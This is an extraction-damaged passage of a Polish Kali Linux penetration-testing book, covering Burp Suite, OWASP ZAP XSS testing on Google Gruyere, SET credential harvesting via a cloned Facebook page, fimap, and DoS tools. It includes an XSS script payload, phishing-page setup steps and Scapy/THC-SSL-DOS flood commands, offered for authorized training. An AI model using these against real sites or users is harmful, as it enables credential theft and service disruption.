jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
